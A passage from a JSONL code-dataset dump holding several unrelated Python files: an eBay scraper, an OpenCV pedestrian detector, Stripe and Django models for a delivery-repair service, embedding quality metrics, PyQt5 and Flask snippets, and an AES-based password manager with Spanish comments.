Result ###################################\n##########################################################\ndef ebay_getSearchResult(product_name):\n url = 'https://www.ebay.com/sch/i.html?_from=R40&_trksid=p2380057.m570&_nkw=' + product_name.replace(' ', '+') + '&_sacat=0'\n webpage = requests.get(url, headers = HEADERS)\n soup = BeautifulSoup(webpage.content, \"lxml\", parse_only=SoupStrainer(\"a\", {'class':'s-item__link'}))\n links = soup.find_all(\"a\", attrs={'class':'s-item__link'})[0: 15]\n product_list = []\n count = product_number\n for link in links: \n link = link.get('href')\n product_list.append(ebay_product(link))\n if count <= 0:\n break\n else:\n count -= 1\n return product_list\n\ndef ebay_product(url):\n webpage = requests.get(url)\n soup = BeautifulSoup(webpage.text, \"html.parser\", parse_only=SoupStrainer([\"title\", \"span\", \"div\"]))\n title = ebay_get_title(soup)\n price = ebay_get_price(soup)\n condition = ebay_get_condition(soup)\n return [str(url), title, price, condition]\n\ndef ebay_get_title(soup):\n try: \n title = soup.title.string.replace(' | eBay', '')\n except:\n title = \"N/A\"\n return title\n\ndef ebay_get_price(soup):\n try:\n price = soup.find(\"span\", attrs={'id':'prcIsum'}).string.replace('US ', '').replace('/ea', '').strip()\n except: \n try:\n price = soup.find(\"span\", attrs={'class':'notranslate', 'itemprop':'price'}).string.replace('US', '').replace(' ', '').strip()\n except:\n price = \"N/A\"\n return price\n\ndef ebay_get_condition(soup):\n try:\n condition = soup.find(\"div\", attrs={'id':'vi-itm-cond'}).text\n except:\n condition = \"N/A\"\n return condition\n","repo_name":"SorosWen/Product_Info_Scraper","sub_path":"AmazonScrap/scrap/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"34705915701","text":"# performs pedestrian detection on still images based on opencv built-in HOG + SVM method\r\n\r\n# the picture directory\r\npic_dir = \"C:\\\\Users\\\\User\\\\Pictures\\\\pedestrian.jpg\"\r\n\r\n# import the necessary packages\r\nfrom imutils.object_detection import non_max_suppression\r\nfrom imutils import paths\r\nimport numpy as np\r\nimport argparse\r\nimport imutils\r\nimport cv2\r\n\r\n# load the image\r\nimg = cv2.imread(pic_dir)\r\n# reduce image size to reduce detection time and improve detection accuracy\r\n#img = imutils.resize(img, width=min(400, img.shape[1]))\r\norig = img.copy()\r\n\r\n# initialize the HOG descriptor/person detector\r\nhog = cv2.HOGDescriptor()\r\nhog.setSVMDetector(cv2.HOGDescriptor_getDefaultPeopleDetector())\r\n\r\nimport time\r\ntic = time.time()\r\n# detect people in the image, weights: confidence value returned by svm for each detection\r\n(rects, weights) = hog.detectMultiScale(img, winStride=(4,4), padding=(8,8),\\\r\n scale = 1.02)\r\n#print('detecting confidence:{}'.format(weights))\r\n\r\nprint(\"time elapsed for hog: {}\".format(time.time()-tic))\r\n\r\n\r\n# draw the original bounding boxes\r\nfor (x, y, w, h) in rects:\r\n cv2.rectangle(orig, (x,y), (x+w, y+h), (0, 0, 255), 2)\r\n\r\n\r\n# apply non-maxima suppression to the bounding boxes using a\r\n# fairly large overlap threshold to try to maintain overlapping\r\n# boxes that are still people\r\nrects = np.array([[x, y, x + w, y + h] for (x, y, w, h) in rects])\r\npick = non_max_suppression(rects, probs=None, overlapThresh=0.65)\r\n\r\n# draw the final bounding boxes\r\nfor (xA, yA, xB, yB) in pick:\r\n cv2.rectangle(img, (xA, yA), (xB, yB), (0, 255, 0), 2)\r\n\r\n\r\n# show some information on the number of bounding boxes\r\nfilename = pic_dir[pic_dir.rfind(\"/\") + 1:]\r\nprint(\"[INFO] {}: {} original boxes, {} after suppression\".format(\\\r\n\t\tfilename, len(rects), len(pick)))\r\n\r\n\r\n# show the output images\r\ncv2.imshow(\"Before NMS\", orig)\r\ncv2.imshow(\"After NMS\", img)\r\ncv2.waitKey(0)\r\n","repo_name":"amandayeyan/video_analytics","sub_path":"hog_descriptor.py","file_name":"hog_descriptor.py","file_ext":"py","file_size_in_byte":1946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"23234491465","text":"from Model2 import data_store\r\nfrom Controller2_demo import Credentials\r\nclass Users:\r\n username=\"\"\r\n email=\"\"\r\n ph=\"\"\r\n residence=\"\"\r\n acc=Credentials()\r\n def __init__(self):\r\n choice=float(input(\"Press\\n1:-Search User\\n2:-Register New User\\n\"))\r\n if choice==1:\r\n self.username=input(\"Enter your Name\\t\")\r\n login_store=data_store()\r\n login_store.setUsername(self.username)\r\n self.acc.check_login(login_store)\r\n #print(login_store.getReply())\r\n else:\r\n self.username=input(\"Enter your Username\\t\")\r\n self.residence=input(\"Enter your Residence\\t\")\r\n self.email=input(\"Enter your Email\\t\")\r\n self.ph=input(\"Enter your Contact\\t\")\r\n register=data_store()\r\n register.setUsername(self.username)\r\n register.setResidence(self.residence)\r\n register.setEmail(self.email)\r\n register.setContact(self.ph)\r\n self.acc.register_user(register)\r\n '''def display(self):\r\n print(self.username)\r\n print(self.password)'''\r\nusr=Users()\r\n\r\n","repo_name":"irtiqa-reyaz/MVC_Login-System","sub_path":"View2_demo.py","file_name":"View2_demo.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"14195865504","text":"import pytest\n\nfrom .test_config import TestMode, TestModeConversionException\n\n\n@pytest.mark.parametrize(\n \"from_mode,to_mode,expected\",\n [\n (TestMode.STANDARD, TestMode.FUZZ, True),\n (TestMode.FUZZ, TestMode.STANDARD, False),\n (TestMode.STANDARD, TestMode.PARAMETERIZED, True),\n (TestMode.PARAMETERIZED, TestMode.FUZZ, True),\n (TestMode.FUZZ, TestMode.PARAMETERIZED, False),\n *[(mode, mode, True) for mode in TestMode],\n *[(TestMode.UNDETERMINED, mode, True) for mode in TestMode],\n *[\n (mode, TestMode.UNDETERMINED, False)\n for mode in TestMode\n if mode is not TestMode.UNDETERMINED\n ],\n ],\n)\ndef test_mode_conversion(from_mode: TestMode, to_mode: TestMode, expected: bool):\n assert from_mode.can_convert_to(to_mode) == expected\n\n if expected:\n assert from_mode.convert_to(to_mode) == to_mode\n else:\n with pytest.raises(TestModeConversionException):\n from_mode.convert_to(to_mode)\n","repo_name":"software-mansion/protostar","sub_path":"protostar/testing/test_config_test.py","file_name":"test_config_test.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":247,"dataset":"github-code","pt":"45"} +{"seq_id":"17086827336","text":"import numpy as np\nfrom sklearn.metrics import pairwise_distances\nimport matplotlib.pyplot as plt\nfrom poincare_maps import *\n\nfrom sklearn.utils.graph_shortest_path import graph_shortest_path\nfrom scipy.sparse import csgraph\nfrom sklearn.neighbors import kneighbors_graph\nfrom data import connect_knn\n\ndef get_dist_manifold(data, k_neighbours = 20, knn_sym=True):\n \"\"\"\n Computes ranking of the original dataset through geodesic distances:\n we estimate KNN graph and find shortest distance on it. The geodesic\n distance between disconnected componenents is set to infinity.\n \"\"\"\n KNN = kneighbors_graph(\n data, k_neighbours, mode='distance', include_self=False).toarray()\n if knn_sym:\n KNN = np.maximum(KNN, KNN.T)\n \n n_components, labels = csgraph.connected_components(KNN)\n \n if (n_components > 1):\n print('Connecting', n_components)\n distances = pairwise_distances(data, metric='euclidean')\n KNN = connect_knn(KNN, distances, n_components, labels)\n \n D_high = graph_shortest_path(KNN)\n return D_high\n\n\ndef get_ranking(distance_matrix):\n \"\"\"\n Get ranking from distance matrix: from Supplementary eq. (2)-(3) \n in Klimovskaia et al.\n \"\"\"\n # According to this definition, reflexive ranks are set\n # to zero and non-reflexive ranks belong to {1,.., N − 1}.\n n = len(distance_matrix)\n Rank = np.zeros([n, n])\n for i in range(n):\n idx = np.array(list(range(n))) \n sidx = np.argsort(distance_matrix[i, :])\n Rank[i, idx[sidx][1:]] = idx[1:]\n\n return Rank\n\n\ndef get_coRanking(Rank_high, Rank_low):\n \"\"\"\n Computes co-ranking matrix Q from Supplementary eq. (4) in Klimovskaia et al.\n \"\"\"\n N = len(Rank_high)\n coRank = np.zeros([N-1, N-1])\n\n for i in range(N):\n for j in range(N):\n k = int(Rank_high[i, j])\n l = int(Rank_low[i, j])\n if (k > 0) and (l > 0):\n coRank[k-1][l-1] += 1\n \n return coRank\n\n\ndef get_score(Rank_high, Rank_low, fname=None): \n \"\"\"\n Computes Qnx scores from Supplementary eq. (5) in Klimovskaia et al.\n \"\"\"\n coRank = get_coRanking(Rank_high, Rank_low)\n N = len(coRank)+1\n\n df_score = pd.DataFrame(columns=['Qnx', 'Bnx'])\n Qnx = 0\n Bnx = 0\n for K in range(1, N):\n Qnx += sum(coRank[:K, K-1]) + sum(coRank[K-1, :K]) - coRank[K-1, K-1]\n Bnx += sum(coRank[:K, K-1]) - sum(coRank[K-1, :K])\n df_score.loc[len(df_score)] = [Qnx /(K*N), Bnx/(K*N)]\n\n if not (fname is None):\n df_score.to_csv(fname, sep = ',', index=False)\n \n return df_score\n\n\ndef get_scalars(Qnx):\n \"\"\"\n Computes scalar scores from Supplementary eq. (6)-(8) in Klimovskaia et al.\n \"\"\"\n N = len(Qnx) # total length of Qnx is smaller than number of samples\n K_max = 0\n val_max = Qnx[0] - 1/N\n for k in range(1, N):\n if val_max < (Qnx[k] - (k+1)/N):\n val_max = Qnx[k] - (k+1)/N\n K_max = k\n\n Qlocal = np.mean(Qnx[:K_max+1])\n Qglobal = np.mean(Qnx[K_max:])\n\n return Qlocal, Qglobal, K_max\n\n\ndef get_quality_metrics( \n coord_high, \n coord_low,\n distance='euclidean', \n setting='manifold',\n fname=None,\n k_neighbours=20,\n verbose=False):\n \"\"\"\n Implementation of 'Scale-independent quality criteria' from Lee et al. \n Parameters\n ----------\n coord_high : np.array\n Feature matrix of the sample in the high dimensional space.\n coord_low : np.array\n Low dimensional embedding of the sample.\n distance : str (default: 'euclidean')\n Distance metric to compute distanced between points in low dimendional \n space. Possible parameters: 'euclidean' or 'poincare'.\n setting: str (default: 'manifold')\n Setting to compute distances in the high dimensional space: 'global'\n distances or distances on the 'manifold' using a k=20 KNN graph.\n fname: str, optional (default: None)\n Name of the file where to save all the information about the metrics.\n verbose: bool (default: False)\n A flag if to print the results of the computations. \n k_neighbours: int (default: 20)\n k-nearest neighbours for setting\n Returns\n -------\n Qlocal: float\n Quality criteria for local qualities of the embedding.\n Range from 0 (bad) to 1 (good).\n Qglobal: float\n Quality criteria for global qualities of the embedding.\n Range from 0 (bad) to 1 (good).\n Kmax: int\n Kmax defines the split of the QNX curv.\n \"\"\"\n\n if setting == 'global':\n D_high = pairwise_distances(coord_high) \n elif setting == 'manifold':\n D_high = get_dist_manifold(\n coord_high, k_neighbours=k_neighbours, knn_sym=True)\n else:\n raise NotImplementedError\n\n Rank_high = get_ranking(D_high)\n\n if distance == 'euclidean': \n D_low = pairwise_distances(coord_low)\n elif distance == 'poincare':\n model = PoincareMaps(coord_low)\n model.get_distances()\n D_low = model.distances \n else:\n raise NotImplementedError\n\n Rank_low = get_ranking(D_low)\n df_score = get_score(Rank_high, Rank_low, fname=fname)\n\n Qlocal, Qglobal, Kmax = get_scalars(df_score['Qnx'].values)\n if verbose:\n print(f\"Qlocal = {Qlocal:.2f}, Qglobal = {Qglobal:.2f}, Kmax = {Kmax}\")\n\n return Qlocal, Qglobal, Kmax\n","repo_name":"facebookresearch/PoincareMaps","sub_path":"embedding_quality_score.py","file_name":"embedding_quality_score.py","file_ext":"py","file_size_in_byte":5424,"program_lang":"python","lang":"en","doc_type":"code","stars":143,"dataset":"github-code","pt":"45"} +{"seq_id":"28868322636","text":"import stripe\nfrom yoga.settings import SITE_NAME\nfrom django.conf import settings\nfrom .stripe_users import StripeCustomer\nimport pendulum\n\nfrom userTransactions.models import UserTransactionItem\nfrom siteTally.models import siteTransaction\nfrom subscription.models import subscription_product, subscription\n\nclass StripeLocalTransactions:\n def __init__(self):\n return self\n \n def create_transaction_webhook_subscription_cycle(self, invoice):\n sub_id = invoice['subscription']\n \n st_sub = stripe.Subscription.retrieve(sub_id)\n local_sub = subscription.objects.filter(creator = st_sub['metadata']['creator'], subsciber = st_sub['metadata']['subscriber']).select_related(\n 'creator', 'subscriber')[0] \n \n self.creator = local_sub.creator\n self.subscriber = local_sub.subscriber \n self.localSubscriptionObj = local_sub \n \n CustomerId = StripeCustomer(self.subscriber).findCreateCustomerId()\n \n try:\n price = int(invoice['amount'])\n UserTransactionItem.objects.create(\n user = self.subscriber,\n units = price,\n is_payment = False,\n is_purchase = True,\n is_refund = False,\n subscription = self.localSubscriptionObj\n )\n \n #create record for creator\n UserTransactionItem.objects.create(\n user = self.creator,\n units = price,\n is_payment = True,\n is_purchase = False,\n is_refund = False,\n subscription = self.localSubscriptionObj\n )\n except:\n return False\n \n try:\n siteTransaction.objects.create(\n st_transaction_id = invoice['id'],\n customerId = CustomerId.stripeCustomer,\n units = price,\n is_payment = True,\n is_refund = False,\n subscription = self.localSubscriptionObj\n )\n return True\n except:\n return False ","repo_name":"scarlettiron/Lotus-Exercise-Live-Stream-And-Subscription","sub_path":"backend/checkout/stripe_local_transactions.py","file_name":"stripe_local_transactions.py","file_ext":"py","file_size_in_byte":2142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"29393569348","text":"import pickle as pkl\n\n\ndef init_graph(path):\n \"\"\"\n return a dict of vertices and edges\n :param path: the path of graph file\n :return: a dict of vertices and edges with keys NodeList and EdgeList\n \"\"\"\n with open(path, 'r', encoding='utf-8') as f:\n fstr = f.read()\n\n index = fstr.find('*Edge')\n ver_keys = ['Node Id', 'Node Name', 'Weight', 'Node Class', 'Other Info']\n vertices = fstr[:index - 1].split('\\n')[1:]\n edges = fstr[index:].split('\\n')[1:-1]\n edg_keys = ['Edge Id-1', 'Edge Id-2', 'Edge Weight']\n\n NodeList = []\n EdgeList = []\n for i in range(len(vertices)):\n value = vertices[i].split('\\t')\n node = dict(zip(ver_keys, value))\n NodeList.append(node)\n for i in range(len(edges)):\n value = edges[i].split('\\t')\n edge = dict(zip(edg_keys, value))\n EdgeList.append(edge)\n res = {'NodeList': NodeList, 'EdgeList': EdgeList}\n return res\n\n\ndef save_graph(filepath, graph):\n \"\"\"\n save the graph\n :param filepath: path of the saving file\n :param graph:\n :return: None\n \"\"\"\n with open(filepath, 'wb') as f:\n pkl.dump(graph, f)\n print('Graph Saved')\n\n\ndef load_graph(filepath):\n \"\"\"\n load graph from savings\n :param filepath:\n :return: graph\n \"\"\"\n with open(filepath, 'rb') as f:\n res = pkl.load(f)\n print('Graph Loaded')\n return res","repo_name":"desline4709/ModernProgramDesigning","sub_path":"week5/GraphStat/GraphBuilder/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"794234332","text":"from flask import Flask, request\nimport os\n\nimport ds_mailer.Sender as Sender\nimport ds_mailer.Sitescanner\nfrom ds_mailer.gamelist import GAMES\n\napp = Flask(__name__)\n\nkey = os.environ['script_key']\n\n\n@app.route('/', methods=[\"POST\"])\ndef run():\n if request.method == \"POST\" and request.form['key'] == key:\n scanner = ds_mailer.Sitescanner.Sitescanner()\n for game in GAMES:\n game.get_current_price(scanner.get_price(game.link))\n text = Sender.create_mail(GAMES)\n return text\n else:\n return \"bad request\\n\"\n","repo_name":"jperelygin/ds_mailer","sub_path":"ds_mailer/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"70643328776","text":"# -*- coding:utf-8 -*-\n# Time : 2019/09/16 下午 9:01 \n# Author : 御承扬\n# e-mail:2923616405@qq.com\n# project: PyQt5\n# File : CAllDialogMainWin.py \n# @software: PyCharm\n\n\nfrom 信号与槽.DateDialog import DateDialog\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import *\nimport sys\n\n\nclass MainWin(QWidget):\n def __init__(self, parent=None):\n super(MainWin, self).__init__(parent)\n self.resize(400, 90)\n self.setWindowIcon(QIcon(\"./images/Python2.ico\"))\n self.setWindowTitle(\"窗口传递数据\")\n self.lineEdit = QLineEdit(self)\n self.button1 = QPushButton(\"弹出对话框1\")\n self.button1.clicked.connect(self.onButton1Click)\n self.button2 = QPushButton('弹出对话框2')\n self.button2.clicked.connect(self.onButton2Click)\n gridLayout = QGridLayout()\n gridLayout.addWidget(self.lineEdit)\n gridLayout.addWidget(self.button1)\n gridLayout.addWidget(self.button2)\n self.setLayout(gridLayout)\n\n def onButton1Click(self):\n dialog = DateDialog(self)\n result = dialog.exec_()\n date = dialog.dateTime()\n self.lineEdit.setText(date.date().toString())\n print('\\n 日期对话框的返回值')\n print('date=%s' % str(date.date()))\n print('time=%s' % str(date.time()))\n print('result=%s' % result)\n dialog.destroy()\n\n def onButton2Click(self):\n date, time, result = DateDialog.getDateTime()\n self.lineEdit.setText(date.toString())\n print('\\n 日期对话框的返回值')\n print('date=%s' % str(date))\n print('time=%s' % str(date))\n print('result=%s' % result)\n if result == QDialog.Accepted:\n print('点击确认按钮')\n else:\n print('点击取消按钮')\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n form = MainWin()\n form.show()\n sys.exit(app.exec_())\n","repo_name":"pyc-ycy/PyQt5","sub_path":"信号与槽/CAllDialogMainWin.py","file_name":"CAllDialogMainWin.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"73877063177","text":"from uuid import uuid4\n\nfrom django.contrib.auth.models import AbstractUser\nfrom django.db import models\nfrom django.conf import settings\nfrom django.utils import timezone\n\nfrom phonenumber_field.modelfields import PhoneNumberField\n\n\nclass DeliveryUser(AbstractUser):\n id = models.UUIDField(verbose_name=\"Идентификатор\", default=uuid4, primary_key=True)\n patronymic = models.CharField(\"Отчетство\", max_length=150, blank=True, default=\"\")\n\n def __str__(self):\n patronymic_first_letter = self.patronymic[0:1] if len(self.patronymic) else \"\"\n first_name_first_letter = self.first_name[0:1] if len(self.first_name) else \"\"\n full_name = \"\"\n if self.first_name and self.last_name:\n full_name += self.last_name\n full_name += f\" {first_name_first_letter}.\"\n if patronymic_first_letter:\n full_name += f\"{patronymic_first_letter}.\"\n full_name += f\" ({self.username})\"\n return full_name\n\n class Meta:\n verbose_name = \"Пользователь\"\n verbose_name_plural = \"Пользователи\"\n ordering = [\"-id\"]\n\n\nclass Client(models.Model):\n id = models.UUIDField(verbose_name=\"Идентификатор\", default=uuid4, primary_key=True)\n first_name = models.CharField(\"Имя\", max_length=150, blank=True)\n patronymic = models.CharField(\"Отчетство\", max_length=150, blank=True, default=\"\")\n last_name = models.CharField(\"Фамилия\", max_length=150, blank=True)\n email = models.EmailField(\"Почта\", blank=True)\n phone_number = PhoneNumberField(\n unique=True, region=settings.PHONE_NUMBER_REGION, max_length=12\n )\n\n def __str__(self):\n patronymic_first_letter = self.patronymic[0:1] if len(self.patronymic) else \"\"\n first_name_first_letter = self.first_name[0:1] if len(self.first_name) else \"\"\n full_name = \"\"\n if self.first_name and self.last_name:\n full_name += self.last_name\n full_name += f\" {first_name_first_letter}.\"\n if patronymic_first_letter:\n full_name += f\"{patronymic_first_letter}.\"\n full_name += f\" ({self.phone_number})\"\n return full_name\n\n class Meta:\n verbose_name = \"Клиент\"\n verbose_name_plural = \"Клиенты\"\n ordering = [\"-id\"]\n\n\nclass TokenData(models.Model):\n user = models.OneToOneField(\n settings.AUTH_USER_MODEL,\n verbose_name=\"Пользователь\",\n on_delete=models.CASCADE,\n unique=True,\n related_name=\"token_data\",\n )\n token = models.CharField(verbose_name=\"Токен\", max_length=1500)\n\n\nclass Deliveryman(models.Model):\n user = models.OneToOneField(\n settings.AUTH_USER_MODEL,\n verbose_name=\"Пользователь\",\n on_delete=models.CASCADE,\n unique=True,\n related_name=\"deliveryman\",\n )\n is_team_lead = models.BooleanField(\n verbose_name=\"Является старшим доставщиком\", default=False\n )\n\n def __str__(self):\n return f\"{self.user}\"\n\n class Meta:\n verbose_name = \"Курьер\"\n verbose_name_plural = \"Курьеры\"\n ordering = [\"-id\"]\n\n\nclass City(models.Model):\n id = models.UUIDField(verbose_name=\"Идентификатор\", default=uuid4, primary_key=True)\n name = models.CharField(verbose_name=\"Название города\", max_length=255)\n\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name = \"Город\"\n verbose_name_plural = \"Города\"\n ordering = [\"-id\"]\n\n\nclass Address(models.Model):\n id = models.UUIDField(verbose_name=\"Идентификатор\", default=uuid4, primary_key=True)\n city = models.ForeignKey(City, verbose_name=\"Город\", on_delete=models.CASCADE)\n street = models.CharField(verbose_name=\"Улица\", max_length=255)\n building = models.CharField(verbose_name=\"Номер дома\", max_length=16)\n apartment = models.IntegerField(verbose_name=\"Номер квартиры\")\n\n def __str__(self):\n return (\n f\"{self.city} ул. {self.street} дом. {self.building} кв. {self.apartment}\"\n )\n\n class Meta:\n verbose_name = \"Адресс\"\n verbose_name_plural = \"Адрессы\"\n ordering = [\"-id\"]\n\n\nclass Order(models.Model):\n class GadgetType(models.TextChoices):\n TELEPHONE = (\"TELEPHONE\", \"телефон\")\n LAPTOP = (\"LAPTOP\", \"ноутбук\")\n TABLET = (\"TABLET\", \"планшет\")\n\n class RepairLvl(models.IntegerChoices):\n UNDEFINED = (0, \"Неопределен\")\n ONE = (1, \"Внешний осмотр, диагностика\")\n TWO = (2, \"Ремонт с разбором телефона, замена не паяных деталей\")\n THREE = (3, \"Замена дисплея, тачскрина\")\n FOUR = (4, \"Электро-механический ремонт\")\n\n class StatusEnum(models.TextChoices):\n CREATED = (\"CREATED\", \"Заявка создана\")\n GETTING_FROM_CLIENT = (\"GETTING_FROM_CLIENT\", \"Получение техники от клиента\")\n SENT_TO_REPAIR = (\"SENT_TO_REPAIR\", \"Доставлен в службу ремонта\")\n REPAIR_IN_PROCESS = (\"REPAIR_IN_PROCESS\", \"Ремонт начат\")\n REPAIR_DONE = (\"REPAIR_DONE\", \"Ремонт закончен\")\n SENDING_TO_CLIENT = (\"SENDING_TO_CLIENT\", \"Доставка техники клиенту\")\n CLOSED = (\"CLOSED\", \"Заявка закрыта\")\n\n id = models.UUIDField(verbose_name=\"Идентификатор заказа\", primary_key=True)\n client = models.ForeignKey(Client, verbose_name=\"Клиент\", on_delete=models.CASCADE)\n status = models.CharField(\n verbose_name=\"Статус заявки\",\n max_length=48,\n choices=StatusEnum.choices,\n )\n category = models.CharField(\n \"Техника\",\n max_length=15,\n choices=GadgetType.choices,\n default=GadgetType.TELEPHONE,\n )\n model = models.CharField(\n verbose_name=\"Модель техники\", max_length=1000, default=\"\", blank=True\n )\n address = models.ForeignKey(\n Address,\n verbose_name=\"Адресс клиента\",\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n )\n serviceman_description = models.CharField(\n verbose_name=\"Комментарий ремонтника\", max_length=1000, default=\"\", blank=True\n )\n customer_description = models.CharField(\n verbose_name=\"Неисправность со слов клиента\",\n max_length=1000,\n default=\"\",\n blank=True,\n )\n deliveryman_description = models.CharField(\n verbose_name=\"Комментарий доставки\", max_length=1000, default=\"\", blank=True\n )\n deliveryman = models.ForeignKey(\n Deliveryman,\n verbose_name=\"Курьер\",\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n )\n created = models.DateTimeField(\n verbose_name=\"Дата и время создания заявки\", default=timezone.now\n )\n updated = models.DateTimeField(\n verbose_name=\"Дата и время редактирования заявки\", auto_now=True\n )\n payment_completed = models.BooleanField(\n verbose_name=\"Оплала произведена?\", default=False\n )\n amount_due_by = models.FloatField(verbose_name=\"Сумма к оплате\", default=0)\n repair_lvl = models.IntegerField(\n verbose_name=\"Уровень ремонта\", choices=RepairLvl.choices, default=0\n )\n\n def __str__(self):\n return f\"Заявка id={self.id}\"\n\n class Meta:\n verbose_name = \"Заявка на доставку\"\n verbose_name_plural = \"Заявки на доставку\"\n ordering = [\"-created\"]\n","repo_name":"DemidovEvg/repair_cookies","sub_path":"delivery/core/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"35184310825","text":"from os.path import expanduser\nhome = expanduser(\"~\")\n\ndirectorio = home + '/gestor_contrasenas'\n\nimport os\nos.chdir(directorio)\n\nimport numpy as np\nimport pandas as pd\nimport re\nimport random\nimport string\n\nfrom Crypto.Cipher import AES\nimport hashlib\n\n#generar_contrasena()\n\ndef generar_contrasena():\n \n caracteres_especiales = re.sub(r\"\\[|\\]|\\(|\\)|\\\\|/|\\{|\\}|<|>|\\||`|\\'|\\\"|\\^\", \n \"\", \n string.punctuation)\n\n caracteres = string.ascii_letters + string.digits + caracteres_especiales\n\n mayuscula = random.choice(string.ascii_uppercase)\n minuscula = random.choice(string.ascii_lowercase)\n numero = random.choice(string.digits)\n caracter_especial = random.choice(caracteres_especiales)\n\n otros = random.choices(caracteres, k = 6)\n \n lista_caracteres = [mayuscula, minuscula, numero, caracter_especial] + otros\n \n contrasena = \"\".join(np.random.choice(lista_caracteres, \n size = 10, \n replace = False))\n return(contrasena)\n\n#validar_contrasena()\n\ndef validar_contrasena(contrasena):\n\n caracteres_especiales = re.sub(r\"\\[|\\]|\\(|\\)|\\\\|/|\\{|\\}|<|>|\\||`|\\'|\\\"|\\^\", \n \"\", \n string.punctuation)\n tiene_mayuscula = re.search(r\"[A-Z]\", contrasena)\n tiene_minuscula = re.search(r\"[a-z]\", contrasena)\n tiene_numero = re.search(r\"[0-9]\", contrasena)\n tiene_caracter_especial = np.any([i in contrasena \\\n for i in caracteres_especiales])\n \n if(len(contrasena) >= 10 and \\\n tiene_mayuscula and \\\n tiene_minuscula and \\\n tiene_numero and \\\n tiene_caracter_especial):\n print(\"La contraseña es válida.\")\n else:\n print(\"La contraseña no es válida.\")\n\nimport base64\nimport hashlib\nfrom Crypto import Random\nfrom Crypto.Cipher import AES\n\n#AESCipher()\n\nclass AESCipher(object):\n\n def __init__(self, key): \n self.bs = AES.block_size\n self.key = hashlib.sha256(key.encode()).digest()\n\n def encrypt(self, raw):\n raw = self._pad(raw)\n iv = Random.new().read(AES.block_size)\n cipher = AES.new(self.key, AES.MODE_CBC, iv)\n return base64.b64encode(iv + cipher.encrypt(raw.encode()))\n\n def decrypt(self, enc):\n enc = base64.b64decode(enc)\n iv = enc[:AES.block_size]\n cipher = AES.new(self.key, AES.MODE_CBC, iv)\n return self._unpad(cipher.decrypt(enc[AES.block_size:])).decode('utf-8')\n\n def _pad(self, s):\n return s + (self.bs - len(s) % self.bs) * chr(self.bs - len(s) % self.bs)\n\n @staticmethod\n def _unpad(s):\n return s[:-ord(s[len(s)-1:])]\n\n#leer_contrasenas()\n\ndef leer_contrasenas():\n\n contrasenas_cifradas = pd.read_csv(\"contrasenas.csv\")\n\n contrasenas = contrasenas_cifradas.copy()\n contrasenas['contrasena'] = [cipher.decrypt(i) \\\n for i in contrasenas_cifradas['contrasena']]\n return(contrasenas)\n\n#guardar_contrasenas()\n\ndef guardar_contrasenas(contrasenas):\n\n contrasenas_cifradas = contrasenas.copy()\n\n contrasenas_cifradas['contrasena'] = [str(cipher.encrypt(i), \"utf-8\") \\\n for i in contrasenas['contrasena']]\n\n contrasenas_cifradas.to_csv('contrasenas.csv', index = False)\n\n#salir()\n\ndef salir():\n exit()\n\n#crear_contrasena_maestra()\n\ndef crear_contrasena_maestra():\n\n raw_1 = input(\"Escribir contraseña: \")\n raw_2 = input(\"Escribir de nuevo la contraseña: \")\n\n if raw_1 == raw_2:\n\n archivo = open(\"contrasena_maestra\", \"wb\")\n archivo.write(hashlib.sha256(raw_1.encode()).digest());\n archivo.close()\n \n global contrasena_maestra\n contrasena_maestra = raw_1\n \n contrasenas = pd.DataFrame({\n 'login':[], \n 'contrasena':[]\n })\n \n contrasenas.to_csv(\"contrasenas.csv\", index = False)\n \n else:\n print(\"Las contraseñas no coinciden\")\n\n#verificar_contrasena_maestra()\n\ndef verificar_contrasena_maestra():\n\n raw = input(\"Ingresar contrasena maestra: \")\n \n archivo = open(\"contrasena_maestra\", \"rb\")\n contrasena = archivo.read()\n archivo.close()\n \n if hashlib.sha256(raw.encode()).digest() == contrasena:\n global contrasena_maestra\n contrasena_maestra = raw\n return(1)\n else:\n return(0)\n\n#agregar_cuenta()\n\ndef agregar_cuenta(*args):\n \n contrasenas = leer_contrasenas()\n \n for cuenta in args:\n if cuenta not in contrasenas['login'].values:\n \n contrasenas = contrasenas.append({'login':cuenta, \n 'contrasena':generar_contrasena()}, \n ignore_index = True)\n \n guardar_contrasenas(contrasenas)\n else:\n print(\"Fallo al agregar cuenta \" + cuenta + \": el nombre ya existe.\")\n\n#mostrar_cuenta()\n\ndef mostrar_cuenta(*args):\n\n if len(args) == 0:\n contrasenas = leer_contrasenas()\n print(contrasenas)\n else:\n contrasenas = leer_contrasenas()\n print(contrasenas[contrasenas['login'].isin(args)])\n\n#eliminar_cuenta()\n\ndef eliminar_cuenta(*args):\n \n contrasenas = leer_contrasenas()\n \n for cuenta in args:\n \n if cuenta in contrasenas['login'].values:\n \n contrasenas = contrasenas.query('login not in @cuenta')\n \n guardar_contrasenas(contrasenas)\n \n else:\n print(\"No se encontró la cuenta \" + cuenta + \".\")\n\n#cambiar_contrasena()\n\ndef cambiar_contrasena(*args):\n\n contrasenas = leer_contrasenas()\n if len(args) == 0:\n n = len(contrasenas['contrasena'])\n contrasenas['contrasena'] = np.array([generar_contrasena() for i in range(n)])\n \n guardar_contrasenas(contrasenas)\n 